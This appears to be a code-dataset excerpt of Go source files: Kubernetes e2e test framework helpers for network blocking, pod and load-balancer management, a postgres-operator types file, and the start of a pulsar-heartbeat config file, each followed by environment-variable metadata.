func EnsureLoadBalancerResourcesDeleted(ip, portRange string) error {
if TestContext.Provider == "gce" || TestContext.Provider == "gke" {
return ensureGCELoadBalancerResourcesDeleted(ip, portRange)
}
return nil
}
func ensureGCELoadBalancerResourcesDeleted(ip, portRange string) error {
gceCloud, err := GetGCECloud()
if err != nil {
return err
}
project := TestContext.CloudConfig.ProjectID
region, err := gcecloud.GetGCERegion(TestContext.CloudConfig.Zone)
if err != nil {
return fmt.Errorf("could not get region for zone %q: %v", TestContext.CloudConfig.Zone, err)
}
return wait.Poll(10*time.Second, 5*time.Minute, func() (bool, error) {
service := gceCloud.GetComputeService()
list, err := service.ForwardingRules.List(project, region).Do()
if err != nil {
return false, err
}
for _, item := range list.Items {
if item.PortRange == portRange && item.IPAddress == ip {
Logf("found a load balancer: %v", item)
return false, nil
}
}
return true, nil
})
}
// The following helper functions can block/unblock network traffic from the
// source host to the destination host by manipulating iptables rules.
// They assume they can ssh to the source host.
//
// Caution:
// Prefer passing IP addresses instead of hostnames. Hostnames force iptables to
// do a DNS lookup to resolve the name to an IP address, which slows down the
// test and causes it to fail if DNS is absent or broken.
//
// Suggested usage pattern:
// func foo() {
// ...
// defer UnblockNetwork(from, to)
// BlockNetwork(from, to)
// ...
// }
//
func BlockNetwork(from string, to string) {
Logf("block network traffic from %s to %s", from, to)
iptablesRule := fmt.Sprintf("OUTPUT --destination %s --jump REJECT", to)
dropCmd := fmt.Sprintf("sudo iptables --insert %s", iptablesRule)
if result, err := SSH(dropCmd, from, TestContext.Provider); result.Code != 0 || err != nil {
LogSSHResult(result)
Failf("Unexpected error: %v", err)
}
}
func UnblockNetwork(from string, to string) {
Logf("Unblock network traffic from %s to %s", from, to)
iptablesRule := fmt.Sprintf("OUTPUT --destination %s --jump REJECT", to)
undropCmd := fmt.Sprintf("sudo iptables --delete %s", iptablesRule)
	// The undrop command may fail if the rule has never been created.
	// In that case we just lose 30 seconds, but the cluster is healthy.
	// But if the rule had been created and removing it failed, the node is broken and
	// not coming back. Subsequent tests will run on fewer nodes (and some of them
	// may fail). Manual intervention is required in such a case (recreating the
	// cluster solves the problem too).
err := wait.Poll(time.Millisecond*100, time.Second*30, func() (bool, error) {
result, err := SSH(undropCmd, from, TestContext.Provider)
if result.Code == 0 && err == nil {
return true, nil
}
LogSSHResult(result)
if err != nil {
Logf("Unexpected error: %v", err)
}
return false, nil
})
if err != nil {
Failf("Failed to remove the iptable REJECT rule. Manual intervention is "+
"required on host %s: remove rule %s, if exists", from, iptablesRule)
}
}
func isElementOf(podUID types.UID, pods *v1.PodList) bool {
for _, pod := range pods.Items {
if pod.UID == podUID {
return true
}
}
return false
}
func CheckRSHashLabel(rs *extensions.ReplicaSet) error {
if len(rs.Labels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 ||
len(rs.Spec.Selector.MatchLabels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 ||
len(rs.Spec.Template.Labels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 {
return fmt.Errorf("unexpected RS missing required pod-hash-template: %+v, selector = %+v, template = %+v", rs, rs.Spec.Selector, rs.Spec.Template)
}
return nil
}
func CheckPodHashLabel(pods *v1.PodList) error {
invalidPod := ""
for _, pod := range pods.Items {
if len(pod.Labels[extensions.DefaultDeploymentUniqueLabelKey]) == 0 {
if len(invalidPod) == 0 {
invalidPod = "unexpected pods missing required pod-hash-template:"
}
invalidPod = fmt.Sprintf("%s %+v;", invalidPod, pod)
}
}
if len(invalidPod) > 0 {
return fmt.Errorf("%s", invalidPod)
}
return nil
}
// timeout for proxy requests.
const proxyTimeout = 2 * time.Minute
// NodeProxyRequest performs a get on a node proxy endpoint given the nodename and rest client.
func NodeProxyRequest(c clientset.Interface, node, endpoint string) (restclient.Result, error) {
// proxy tends to hang in some cases when Node is not ready. Add an artificial timeout for this call.
// This will leak a goroutine if proxy hangs. #22165
subResourceProxyAvailable, err := ServerVersionGTE(SubResourceServiceAndNodeProxyVersion, c.Discovery())
if err != nil {
return restclient.Result{}, err
}
var result restclient.Result
finished := make(chan struct{})
go func() {
if subResourceProxyAvailable {
result = c.Core().RESTClient().Get().
Resource("nodes").
SubResource("proxy").
Name(fmt.Sprintf("%v:%v", node, ports.KubeletPort)).
Suffix(endpoint).
Do()
} else {
result = c.Core().RESTClient().Get().
Prefix("proxy").
Resource("nodes").
Name(fmt.Sprintf("%v:%v", node, ports.KubeletPort)).
Suffix(endpoint).
Do()
}
finished <- struct{}{}
}()
select {
case <-finished:
return result, nil
case <-time.After(proxyTimeout):
return restclient.Result{}, nil
}
}
// GetKubeletPods retrieves the list of pods on the kubelet
func GetKubeletPods(c clientset.Interface, node string) (*v1.PodList, error) {
return getKubeletPods(c, node, "pods")
}
// GetKubeletRunningPods retrieves the list of running pods on the kubelet. The
// returned pods include necessary information (e.g., UID, name, namespace for
// pods/containers) but do not contain the full spec.
func GetKubeletRunningPods(c clientset.Interface, node string) (*v1.PodList, error) {
return getKubeletPods(c, node, "runningpods")
}
func getKubeletPods(c clientset.Interface, node, resource string) (*v1.PodList, error) {
result := &v1.PodList{}
client, err := NodeProxyRequest(c, node, resource)
if err != nil {
return &v1.PodList{}, err
}
if err = client.Into(result); err != nil {
return &v1.PodList{}, err
}
return result, nil
}
// LaunchWebserverPod launches a pod serving http on port 8080 to act
// as the target for networking connectivity checks. The "IP:port" of
// the created pod is returned if the pod launches successfully.
func LaunchWebserverPod(f *Framework, podName, nodeName string) (ip string) {
containerName := fmt.Sprintf("%s-container", podName)
port := 8080
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: podName,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: containerName,
Image: "gcr.io/google_containers/porter:4524579c0eb935c056c8e75563b4e1eda31587e0",
Env: []v1.EnvVar{{Name: fmt.Sprintf("SERVE_PORT_%d", port), Value: "foo"}},
Ports: []v1.ContainerPort{{ContainerPort: int32(port)}},
},
},
NodeName: nodeName,
RestartPolicy: v1.RestartPolicyNever,
},
}
podClient := f.ClientSet.Core().Pods(f.Namespace.Name)
_, err := podClient.Create(pod)
ExpectNoError(err)
ExpectNoError(f.WaitForPodRunning(podName))
createdPod, err := podClient.Get(podName, metav1.GetOptions{})
ExpectNoError(err)
ip = fmt.Sprintf("%s:%d", createdPod.Status.PodIP, port)
Logf("Target pod IP:port is %s", ip)
return
}
// CheckConnectivityToHost launches a pod to test connectivity to the specified
// host. An error will be returned if the host is not reachable from the pod.
//
// An empty nodeName will let the scheduler choose where the pod is executed.
func CheckConnectivityToHost(f *Framework, nodeName, podName, host string, timeout int) error {
contName := fmt.Sprintf("%s-container", podName)
command := []string{
"ping",
"-c", "3", // send 3 pings
"-W", "2", // wait at most 2 seconds for a reply
"-w", strconv.Itoa(timeout),
host,
}
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: podName,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: contName,
Image: "gcr.io/google_containers/busybox:1.24",
Command: command,
},
},
NodeName: nodeName,
RestartPolicy: v1.RestartPolicyNever,
},
}
podClient := f.ClientSet.Core().Pods(f.Namespace.Name)
_, err := podClient.Create(pod)
if err != nil {
return err
}
err = WaitForPodSuccessInNamespace(f.ClientSet, podName, f.Namespace.Name)
if err != nil {
logs, logErr := GetPodLogs(f.ClientSet, f.Namespace.Name, pod.Name, contName)
if logErr != nil {
Logf("Warning: Failed to get logs from pod %q: %v", pod.Name, logErr)
} else {
Logf("pod %s/%s logs:\n%s", f.Namespace.Name, pod.Name, logs)
}
}
return err
}
// CoreDump SSHs to the master and all nodes and dumps their logs into dir.
// It shells out to cluster/log-dump.sh to accomplish this.
func CoreDump(dir string) {
if TestContext.DisableLogDump {
Logf("Skipping dumping logs from cluster")
return
}
cmd := exec.Command(path.Join(TestContext.RepoRoot, "cluster", "log-dump.sh"), dir)
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
if err := cmd.Run(); err != nil {
Logf("Error running cluster/log-dump.sh: %v", err)
}
}
func UpdatePodWithRetries(client clientset.Interface, ns, name string, update func(*v1.Pod)) (*v1.Pod, error) {
for i := 0; i < 3; i++ {
pod, err := client.Core().Pods(ns).Get(name, metav1.GetOptions{})
if err != nil {
return nil, fmt.Errorf("Failed to get pod %q: %v", name, err)
}
update(pod)
pod, err = client.Core().Pods(ns).Update(pod)
if err == nil {
return pod, nil
}
if !apierrs.IsConflict(err) && !apierrs.IsServerTimeout(err) {
return nil, fmt.Errorf("Failed to update pod %q: %v", name, err)
}
}
return nil, fmt.Errorf("Too many retries updating Pod %q", name)
}
func GetPodsInNamespace(c clientset.Interface, ns string, ignoreLabels map[string]string) ([]*v1.Pod, error) {
pods, err := c.Core().Pods(ns).List(metav1.ListOptions{})
if err != nil {
return []*v1.Pod{}, err
}
ignoreSelector := labels.SelectorFromSet(ignoreLabels)
filtered := []*v1.Pod{}
	// Index into the slice rather than taking the address of the (reused)
	// range variable, which would alias every appended pointer to the same pod.
	for i := range pods.Items {
		p := &pods.Items[i]
		if len(ignoreLabels) != 0 && ignoreSelector.Matches(labels.Set(p.Labels)) {
			continue
		}
		filtered = append(filtered, p)
	}
return filtered, nil
}
// RunCmd runs cmd using args and returns its stdout and stderr. It also outputs
// cmd's stdout and stderr to their respective OS streams.
func RunCmd(command string, args ...string) (string, string, error) {
return RunCmdEnv(nil, command, args...)
}
// RunCmdEnv runs cmd with the provided environment and args and
// returns its stdout and stderr. It also outputs cmd's stdout and
// stderr to their respective OS streams.
func RunCmdEnv(env []string, command string, args ...string) (string, string, error) {
Logf("Running %s %v", command, args)
var bout, berr bytes.Buffer
cmd := exec.Command(command, args...)
// We also output to the OS stdout/stderr to aid in debugging in case cmd
// hangs and never returns before the test gets killed.
//
// This creates some ugly output because gcloud doesn't always provide
// newlines.
cmd.Stdout = io.MultiWriter(os.Stdout, &bout)
cmd.Stderr = io.MultiWriter(os.Stderr, &berr)
cmd.Env = env
err := cmd.Run()
stdout, stderr := bout.String(), berr.String()
if err != nil {
return "", "", fmt.Errorf("error running %s %v; got error %v, stdout %q, stderr %q",
command, args, err, stdout, stderr)
}
return stdout, stderr, nil
}
// retryCmd runs cmd using args and retries it for up to SingleCallTimeout if
// it returns an error. It returns stdout and stderr.
func retryCmd(command string, args ...string) (string, string, error) {
var err error
stdout, stderr := "", ""
wait.Poll(Poll, SingleCallTimeout, func() (bool, error) {
stdout, stderr, err = RunCmd(command, args...)
if err != nil {
Logf("Got %v", err)
return false, nil
}
return true, nil
})
return stdout, stderr, err
}
// GetPodsScheduled returns the lists of currently scheduled and not scheduled pods, excluding those on master nodes.
func GetPodsScheduled(masterNodes sets.String, pods *v1.PodList) (scheduledPods, notScheduledPods []v1.Pod) {
for _, pod := range pods.Items {
if !masterNodes.Has(pod.Spec.NodeName) {
if pod.Spec.NodeName != "" {
_, scheduledCondition := podutil.GetPodCondition(&pod.Status, v1.PodScheduled)
Expect(scheduledCondition != nil).To(Equal(true))
Expect(scheduledCondition.Status).To(Equal(v1.ConditionTrue))
scheduledPods = append(scheduledPods, pod)
} else {
_, scheduledCondition := podutil.GetPodCondition(&pod.Status, v1.PodScheduled)
Expect(scheduledCondition != nil).To(Equal(true))
Expect(scheduledCondition.Status).To(Equal(v1.ConditionFalse))
if scheduledCondition.Reason == "Unschedulable" {
notScheduledPods = append(notScheduledPods, pod)
}
}
}
}
return
}
// WaitForStableCluster waits until all existing pods are scheduled and returns the number of scheduled pods.
func WaitForStableCluster(c clientset.Interface, masterNodes sets.String) int {
timeout := 10 * time.Minute
startTime := time.Now()
allPods, err := c.Core().Pods(metav1.NamespaceAll).List(metav1.ListOptions{})
ExpectNoError(err)
// API server returns also Pods that succeeded. We need to filter them out.
currentPods := make([]v1.Pod, 0, len(allPods.Items))
for _, pod := range allPods.Items {
if pod.Status.Phase != v1.PodSucceeded && pod.Status.Phase != v1.PodFailed {
currentPods = append(currentPods, pod)
}
}
allPods.Items = currentPods
scheduledPods, currentlyNotScheduledPods := GetPodsScheduled(masterNodes, allPods)
for len(currentlyNotScheduledPods) != 0 {
time.Sleep(2 * time.Second)
allPods, err := c.Core().Pods(metav1.NamespaceAll).List(metav1.ListOptions{})
ExpectNoError(err)
scheduledPods, currentlyNotScheduledPods = GetPodsScheduled(masterNodes, allPods)
if startTime.Add(timeout).Before(time.Now()) {
Failf("Timed out after %v waiting for stable cluster.", timeout)
break
}
}
return len(scheduledPods)
}
// GetMasterAndWorkerNodesOrDie returns the set of master node names and a list of schedulable worker nodes
func GetMasterAndWorkerNodesOrDie(c clientset.Interface) (sets.String, *v1.NodeList) {
nodes := &v1.NodeList{}
masters := sets.NewString()
all, _ := c.Core().Nodes().List(metav1.ListOptions{})
for _, n := range all.Items {
if system.IsMasterNode(n.Name) {
masters.Insert(n.Name)
} else if isNodeSchedulable(&n) && isNodeUntainted(&n) {
nodes.Items = append(nodes.Items, n)
}
}
return masters, nodes
}
func ListNamespaceEvents(c clientset.Interface, ns string) error {
ls, err := c.Core().Events(ns).List(metav1.ListOptions{})
if err != nil {
return err
}
for _, event := range ls.Items {
glog.Infof("Event(%#v): type: '%v' reason: '%v' %v", event.InvolvedObject, event.Type, event.Reason, event.Message)
}
return nil
}
// E2ETestNodePreparer implements testutils.TestNodePreparer interface, which is used
// to create/modify Nodes before running a test.
type E2ETestNodePreparer struct {
client clientset.Interface
	// Specifies how many nodes should be modified using the given strategy.
	// Only one strategy can be applied to a single Node, so there needs to
	// be at least <sum of counts> Nodes in the cluster.
countToStrategy []testutils.CountToStrategy
nodeToAppliedStrategy map[string]testutils.PrepareNodeStrategy
}
func NewE2ETestNodePreparer(client clientset.Interface, countToStrategy []testutils.CountToStrategy) testutils.TestNodePreparer {
return &E2ETestNodePreparer{
client: client,
countToStrategy: countToStrategy,
nodeToAppliedStrategy: make(map[string]testutils.PrepareNodeStrategy),
}
}
func (p *E2ETestNodePreparer) PrepareNodes() error {
nodes := GetReadySchedulableNodesOrDie(p.client)
	numTemplates := 0
	for _, v := range p.countToStrategy {
		numTemplates += v.Count
	}
if numTemplates > len(nodes.Items) {
return fmt.Errorf("Can't prepare Nodes. Got more templates than existing Nodes.")
}
index := 0
sum := 0
for _, v := range p.countToStrategy {
sum += v.Count
for ; index < sum; index++ {
if err := testutils.DoPrepareNode(p.client, &nodes.Items[index], v.Strategy); err != nil {
glog.Errorf("Aborting node preparation: %v", err)
return err
}
p.nodeToAppliedStrategy[nodes.Items[index].Name] = v.Strategy
}
}
return nil
}
func (p *E2ETestNodePreparer) CleanupNodes() error {
var encounteredError error
nodes := GetReadySchedulableNodesOrDie(p.client)
for i := range nodes.Items {
var err error
name := nodes.Items[i].Name
strategy, found := p.nodeToAppliedStrategy[name]
if found {
if err = testutils.DoCleanupNode(p.client, name, strategy); err != nil {
glog.Errorf("Skipping cleanup of Node: failed update of %v: %v", name, err)
encounteredError = err
}
}
}
return encounteredError
}
// CleanupGCEResources cleans up GCE Service Type=LoadBalancer resources with
// the given name. The name is usually the UUID of the Service prefixed with an
// alpha-numeric character ('a') to work around cloudprovider rules.
func CleanupGCEResources(loadBalancerName string) (retErr error) {
gceCloud, err := GetGCECloud()
if err != nil {
return err
}
if err := gceCloud.DeleteFirewall(loadBalancerName); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = err
}
if err := gceCloud.DeleteForwardingRule(loadBalancerName); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, err)
}
if err := gceCloud.DeleteGlobalStaticIP(loadBalancerName); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, err)
}
// This function shells out to gcloud, so we can't compare for NotFound errors.
// TODO: Invoke cloudprovider method directly instead.
if err := DeleteGCEStaticIP(loadBalancerName); err != nil {
Logf("%v", err)
}
hc, getErr := gceCloud.GetHttpHealthCheck(loadBalancerName)
if getErr != nil && !IsGoogleAPIHTTPErrorCode(getErr, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, getErr)
return
}
if err := gceCloud.DeleteTargetPool(loadBalancerName, hc); err != nil &&
!IsGoogleAPIHTTPErrorCode(err, http.StatusNotFound) {
retErr = fmt.Errorf("%v\n%v", retErr, err)
}
return
}
// IsGoogleAPIHTTPErrorCode returns true if the error is a Google API
// error matching the corresponding HTTP error code.
func IsGoogleAPIHTTPErrorCode(err error, code int) bool {
apiErr, ok := err.(*googleapi.Error)
return ok && apiErr.Code == code
}
// getMaster populates the externalIP, internalIP and hostname fields of the master.
// If any of these is unavailable, it is set to "".
func getMaster(c clientset.Interface) Address {
master := Address{}
// Populate the internal IP.
eps, err := c.Core().Endpoints(metav1.NamespaceDefault).Get("kubernetes", metav1.GetOptions{})
if err != nil {
Failf("Failed to get kubernetes endpoints: %v", err)
}
if len(eps.Subsets) != 1 || len(eps.Subsets[0].Addresses) != 1 {
		Failf("Expected exactly one endpoint for the kubernetes service, got: %+v", eps)
}
master.internalIP = eps.Subsets[0].Addresses[0].IP
// Populate the external IP/hostname.
url, err := url.Parse(TestContext.Host)
if err != nil {
Failf("Failed to parse hostname: %v", err)
}
if net.ParseIP(url.Host) != nil {
// TODO: Check that it is external IP (not having a reserved IP address as per RFC1918).
master.externalIP = url.Host
} else {
master.hostname = url.Host
}
return master
}
// GetMasterAddress returns the hostname/external IP/internal IP as appropriate for e2e tests on a particular provider;
// this is the address of the interface used for communication with the kubelet.
func GetMasterAddress(c clientset.Interface) string {
master := getMaster(c)
switch TestContext.Provider {
case "gce", "gke":
return master.externalIP
case "aws":
return awsMasterIP
default:
Failf("This test is not supported for provider %s and should be disabled", TestContext.Provider)
}
return ""
}
// GetNodeExternalIP returns node external IP concatenated with port 22 for ssh
// e.g. 1.2.3.4:22
func GetNodeExternalIP(node *v1.Node) string {
Logf("Getting external IP address for %s", node.Name)
host := ""
for _, a := range node.Status.Addresses {
if a.Type == v1.NodeExternalIP {
host = net.JoinHostPort(a.Address, sshPort)
break
}
}
if host == "" {
Failf("Couldn't get the external IP of host %s with addresses %v", node.Name, node.Status.Addresses)
}
return host
}
// RcByNamePort returns a ReplicationController with specified name and port
func RcByNamePort(name string, replicas int32, image string, port int, protocol v1.Protocol,
labels map[string]string, gracePeriod *int64) *v1.ReplicationController {
return RcByNameContainer(name, replicas, image, labels, v1.Container{
Name: name,
Image: image,
Ports: []v1.ContainerPort{{ContainerPort: int32(port), Protocol: protocol}},
}, gracePeriod)
}
// RcByNameContainer returns a ReplicationController with the specified name and container
func RcByNameContainer(name string, replicas int32, image string, labels map[string]string, c v1.Container,
gracePeriod *int64) *v1.ReplicationController {
zeroGracePeriod := int64(0)
// Add "name": name to the labels, overwriting if it exists.
labels["name"] = name
if gracePeriod == nil {
gracePeriod = &zeroGracePeriod
}
return &v1.ReplicationController{
TypeMeta: metav1.TypeMeta{
Kind: "ReplicationController",
APIVersion: api.Registry.GroupOrDie(v1.GroupName).GroupVersion.String(),
},
ObjectMeta: metav1.ObjectMeta{
Name: name,
},
Spec: v1.ReplicationControllerSpec{
Replicas: func(i int32) *int32 { return &i }(replicas),
Selector: map[string]string{
"name": name,
},
Template: &v1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Labels: labels,
},
Spec: v1.PodSpec{
Containers: []v1.Container{c},
TerminationGracePeriodSeconds: gracePeriod,
},
},
},
}
}
// SimpleGET executes a get on the given url, returns error if non-200 returned.
func SimpleGET(c *http.Client, url, host string) (string, error) {
req, err := http.NewRequest("GET", url, nil)
if err != nil {
return "", err
}
req.Host = host
res, err := c.Do(req)
if err != nil {
return "", err
}
defer res.Body.Close()
rawBody, err := ioutil.ReadAll(res.Body)
if err != nil {
return "", err
}
body := string(rawBody)
if res.StatusCode != http.StatusOK {
err = fmt.Errorf(
"GET returned http error %v", res.StatusCode)
}
return body, err
}
// PollURL polls until the url responds with a healthy http code. If
// expectUnreachable is true, it instead breaks on the first non-healthy http code.
func PollURL(route, host string, timeout time.Duration, interval time.Duration, httpClient *http.Client, expectUnreachable bool) error {
var lastBody string
pollErr := wait.PollImmediate(interval, timeout, func() (bool, error) {
var err error
lastBody, err = SimpleGET(httpClient, route, host)
if err != nil {
Logf("host %v path %v: %v unreachable", host, route, err)
return expectUnreachable, nil
}
return !expectUnreachable, nil
})
if pollErr != nil {
return fmt.Errorf("Failed to execute a successful GET within %v, Last response body for %v, host %v:\n%v\n\n%v\n",
timeout, route, host, lastBody, pollErr)
}
return nil
}
func DescribeIng(ns string) {
Logf("\nOutput of kubectl describe ing:\n")
desc, _ := RunKubectl(
"describe", "ing", fmt.Sprintf("--namespace=%v", ns))
Logf(desc)
}
// NewTestPod returns a pod that has the specified requests and limits
func (f *Framework) NewTestPod(name string, requests v1.ResourceList, limits v1.ResourceList) *v1.Pod {
return &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: name,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "pause",
Image: GetPauseImageName(f.ClientSet),
Resources: v1.ResourceRequirements{
Requests: requests,
Limits: limits,
},
},
},
},
}
}
// CreateEmptyFileOnPod creates an empty file at the given path in the specified pod.
func CreateEmptyFileOnPod(namespace string, podName string, filePath string) error {
_, err := RunKubectl("exec", fmt.Sprintf("--namespace=%s", namespace), podName, "--", "/bin/sh", "-c", fmt.Sprintf("touch %s", filePath))
return err
}
// GetAzureCloud returns azure cloud provider
func GetAzureCloud() (*azure.Cloud, error) {
cloud, ok := TestContext.CloudConfig.Provider.(*azure.Cloud)
if !ok {
return nil, fmt.Errorf("failed to convert CloudConfig.Provider to Azure: %#v", TestContext.CloudConfig.Provider)
}
return cloud, nil
}
func PrintSummaries(summaries []TestDataSummary, testBaseName string) {
now := time.Now()
for i := range summaries {
Logf("Printing summary: %v", summaries[i].SummaryKind())
switch TestContext.OutputPrintType {
case "hr":
if TestContext.ReportDir == "" {
Logf(summaries[i].PrintHumanReadable())
} else {
// TODO: learn to extract test name and append it to the kind instead of timestamp.
filePath := path.Join(TestContext.ReportDir, summaries[i].SummaryKind()+"_"+testBaseName+"_"+now.Format(time.RFC3339)+".txt")
if err := ioutil.WriteFile(filePath, []byte(summaries[i].PrintHumanReadable()), 0644); err != nil {
Logf("Failed to write file %v with test performance data: %v", filePath, err)
}
}
case "json":
fallthrough
default:
if TestContext.OutputPrintType != "json" {
Logf("Unknown output type: %v. Printing JSON", TestContext.OutputPrintType)
}
if TestContext.ReportDir == "" {
Logf("%v JSON\n%v", summaries[i].SummaryKind(), summaries[i].PrintJSON())
Logf("Finished")
} else {
// TODO: learn to extract test name and append it to the kind instead of timestamp.
filePath := path.Join(TestContext.ReportDir, summaries[i].SummaryKind()+"_"+testBaseName+"_"+now.Format(time.RFC3339)+".json")
if err := ioutil.WriteFile(filePath, []byte(summaries[i].PrintJSON()), 0644); err != nil {
Logf("Failed to write file %v with test performance data: %v", filePath, err)
}
}
}
}
}
| [
"\"KUBE_SSH_USER\"",
"\"USER\"",
"\"HOME\"",
"\"AWS_SSH_KEY\"",
"\"VAGRANT_SSH_KEY\"",
"\"LOCAL_SSH_KEY\""
] | [] | [
"VAGRANT_SSH_KEY",
"LOCAL_SSH_KEY",
"AWS_SSH_KEY",
"KUBE_SSH_USER",
"USER",
"HOME"
] | [] | ["VAGRANT_SSH_KEY", "LOCAL_SSH_KEY", "AWS_SSH_KEY", "KUBE_SSH_USER", "USER", "HOME"] | go | 6 | 0 | |
pkg/spec/types.go | package spec
import (
"database/sql"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"strings"
"time"
"github.com/sirupsen/logrus"
"k8s.io/apimachinery/pkg/types"
"k8s.io/client-go/rest"
)
// NamespacedName describes the namespace/name pairs used in Kubernetes names.
type NamespacedName types.NamespacedName
const fileWithNamespace = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
// RoleOrigin contains the code of the origin of a role
type RoleOrigin int
// The RoleOrigin constant values must be sorted by the role priority for
// resolveNameConflict(...) to work.
const (
RoleOriginUnknown RoleOrigin = iota
RoleOriginManifest
RoleOriginInfrastructure
RoleOriginTeamsAPI
RoleOriginSystem
RoleOriginBootstrap
RoleConnectionPooler
)
type syncUserOperation int
// Possible values for the sync user operation (removal of users is not supported yet)
const (
PGSyncUserAdd = iota
PGsyncUserAlter
PGSyncAlterSet // handle ALTER ROLE SET parameter = value
)
// PgUser contains information about a single user.
type PgUser struct {
Origin RoleOrigin `yaml:"-"`
Name string `yaml:"-"`
Password string `yaml:"-"`
Flags []string `yaml:"user_flags"`
MemberOf []string `yaml:"inrole"`
Parameters map[string]string `yaml:"db_parameters"`
AdminRole string `yaml:"admin_role"`
}
// PgUserMap maps user names to the definitions.
type PgUserMap map[string]PgUser
// PgSyncUserRequest has information about a single request to sync a user.
type PgSyncUserRequest struct {
Kind syncUserOperation
User PgUser
}
// UserSyncer defines an interface for the implementations to sync users from the manifest to the DB.
type UserSyncer interface {
ProduceSyncRequests(dbUsers PgUserMap, newUsers PgUserMap) (req []PgSyncUserRequest)
ExecuteSyncRequests(req []PgSyncUserRequest, db *sql.DB) error
}
// LogEntry describes log entry in the RingLogger
type LogEntry struct {
Time time.Time
Level logrus.Level
ClusterName *NamespacedName `json:",omitempty"`
Worker *uint32 `json:",omitempty"`
Message string
}
// Diff describes a single diff along with when it was observed and processed
type Diff struct {
EventTime time.Time
ProcessTime time.Time
Diff []string
}
// ControllerStatus describes status of the controller
type ControllerStatus struct {
LastSyncTime int64
Clusters int
WorkerQueueSize map[int]int
}
// QueueDump describes cache.FIFO queue
type QueueDump struct {
Keys []string
List []interface{}
}
// ControllerConfig describes configuration of the controller
type ControllerConfig struct {
RestConfig *rest.Config `json:"-"`
InfrastructureRoles map[string]PgUser
NoDatabaseAccess bool
NoTeamsAPI bool
CRDReadyWaitInterval time.Duration
CRDReadyWaitTimeout time.Duration
ConfigMapName NamespacedName
Namespace string
}
// operatorNamespace caches the value returned by GetOperatorNamespace
var operatorNamespace string
func (n NamespacedName) String() string {
return types.NamespacedName(n).String()
}
// MarshalJSON defines marshaling rule for the namespaced name type.
func (n NamespacedName) MarshalJSON() ([]byte, error) {
return []byte("\"" + n.String() + "\""), nil
}
// Decode converts a (possibly unqualified) string into the namespaced name object.
func (n *NamespacedName) Decode(value string) error {
return n.DecodeWorker(value, GetOperatorNamespace())
}
// UnmarshalJSON converts a byte slice to NamespacedName
func (n *NamespacedName) UnmarshalJSON(data []byte) error {
result := NamespacedName{}
var tmp string
if err := json.Unmarshal(data, &tmp); err != nil {
return err
}
if err := result.Decode(tmp); err != nil {
return err
}
*n = result
return nil
}
// DecodeWorker separates the decode logic so it can be unit tested independently
// of obtaining the operator namespace, which depends on k8s mounting files at runtime
func (n *NamespacedName) DecodeWorker(value, operatorNamespace string) error {
var (
name types.NamespacedName
)
result := strings.SplitN(value, string(types.Separator), 2)
if len(result) < 2 {
name.Name = result[0]
} else {
name.Name = strings.TrimLeft(result[1], string(types.Separator))
name.Namespace = result[0]
}
if name.Name == "" {
return fmt.Errorf("incorrect namespaced name: %v", value)
}
if name.Namespace == "" {
name.Namespace = operatorNamespace
}
*n = NamespacedName(name)
return nil
}
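// Illustrative examples (the names below are made up): with operator
// namespace "operators",
//
//	var n NamespacedName
//	_ = n.DecodeWorker("mycluster", "operators")       // -> operators/mycluster
//	_ = n.DecodeWorker("teamA/mycluster", "operators") // -> teamA/mycluster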
func (r RoleOrigin) String() string {
switch r {
case RoleOriginUnknown:
return "unknown"
case RoleOriginManifest:
return "manifest role"
case RoleOriginInfrastructure:
return "infrastructure role"
case RoleOriginTeamsAPI:
return "teams API role"
case RoleOriginSystem:
return "system role"
case RoleOriginBootstrap:
return "bootstrapped role"
case RoleConnectionPooler:
return "connection pooler role"
default:
panic(fmt.Sprintf("bogus role origin value %d", r))
}
}
// GetOperatorNamespace assumes the serviceaccount secret is mounted by Kubernetes.
// Placing this func here instead of pkg/util avoids a circular import.
func GetOperatorNamespace() string {
if operatorNamespace == "" {
if namespaceFromEnvironment := os.Getenv("OPERATOR_NAMESPACE"); namespaceFromEnvironment != "" {
return namespaceFromEnvironment
}
operatorNamespaceBytes, err := ioutil.ReadFile(fileWithNamespace)
if err != nil {
log.Fatalf("Unable to detect operator namespace from within its pod due to: %v", err)
}
operatorNamespace = string(operatorNamespaceBytes)
}
return operatorNamespace
}
| [
"\"OPERATOR_NAMESPACE\""
] | [] | [
"OPERATOR_NAMESPACE"
] | [] | ["OPERATOR_NAMESPACE"] | go | 1 | 0 | |
src/cfg/config.go | //
// Copyright (c) 2020-2021 Datastax, Inc.
//
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
//
package cfg
import (
"bytes"
"encoding/json"
"io/ioutil"
"os"
"strings"
"time"
"unicode"
"github.com/datastax/pulsar-heartbeat/src/util"
"github.com/apex/log"
"github.com/ghodss/yaml"
)
// PrometheusCfg configures the Prometheus setup
type PrometheusCfg struct {
Port string `json:"port"`
ExposeMetrics bool `json:"exposeMetrics"`
PrometheusProxyURL string `json:"prometheusProxyURL"`
PrometheusProxyAPIKey string `json:"prometheusProxyAPIKey"`
}
// SlackCfg is slack configuration
type SlackCfg struct {
